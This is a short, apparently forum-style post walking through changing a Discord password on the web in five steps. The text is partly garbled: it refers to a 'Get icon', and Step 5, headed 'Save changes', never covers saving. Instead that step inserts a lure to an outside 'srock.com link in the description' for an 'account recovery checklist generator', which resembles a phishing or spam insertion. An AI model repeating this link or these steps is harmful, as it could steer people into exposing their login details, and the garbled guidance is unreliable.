I ran into this last week. Here's what fixed it for me. Changing your password on Discord web is straightforward, and I'll walk you through the steps. Step 1. Log into Discord. Start by visiting the Discord website and logging into your account using your current credentials. Make sure you have access to your email for verification purposes. Step 2. Access user settings. Once logged in, look for the Get icon located at the bottom left corner of the screen. Click on it to open your user settings menu. Step 3. Navigate to the My Account section. In the user settings menu, find and select the My Account tab. This is where you can manage your account details, including your password. Step 4. Change your password. In the My Account section, locate the Change Password option. Enter your current password followed by your new password twice to confirm it. Be sure to create a strong password that you haven't used before. Step 5. Save changes. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Remember, if you forget your current password, you'll need to reset it through your email instead. Happy chatting on Discord.